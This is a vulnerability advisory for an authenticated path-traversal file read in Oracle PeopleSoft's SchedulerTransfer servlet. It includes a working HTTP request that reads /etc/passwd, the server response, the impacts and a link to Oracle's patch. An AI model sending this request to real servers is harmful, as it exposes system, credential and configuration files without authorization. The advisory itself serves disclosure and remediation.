Oracle Peoplesoft - Arbitrary File Retrieval - Authenticated

Oracle Peoplesoft - Arbitrary File Retrieval - Authenticated

Vulnerable Systems:

  • Peoplesoft 8.51 and most likely all prior version as well.

Description:

The application is vulnerable to Arbitrary File Retrieval.

POC:

The vulnerable servlet is:

  • /SchedulerTransfer/
GET /SchedulerTransfer/<sitename>/..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd?&filestats=1 HTTP/1.1
Host: xxxxxxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: xxxxxxxxxxxxxxxxxxxxx
Response
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2012 05:10:25 GMT
Content-Type: application/octet-stream
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from xxxxxxxxx.com
Content-Length: 306692
Keep-Alive: timeout=120, max=100
Connection: Keep-Alive

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin

Impact:

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:

  • Harvest useful information from the Weblogic configuration files.
  • Download the whole web application source code like the vulnerable page itself

Recommendation:

Please see the according Oracle CPU under:
http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841214.xml

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.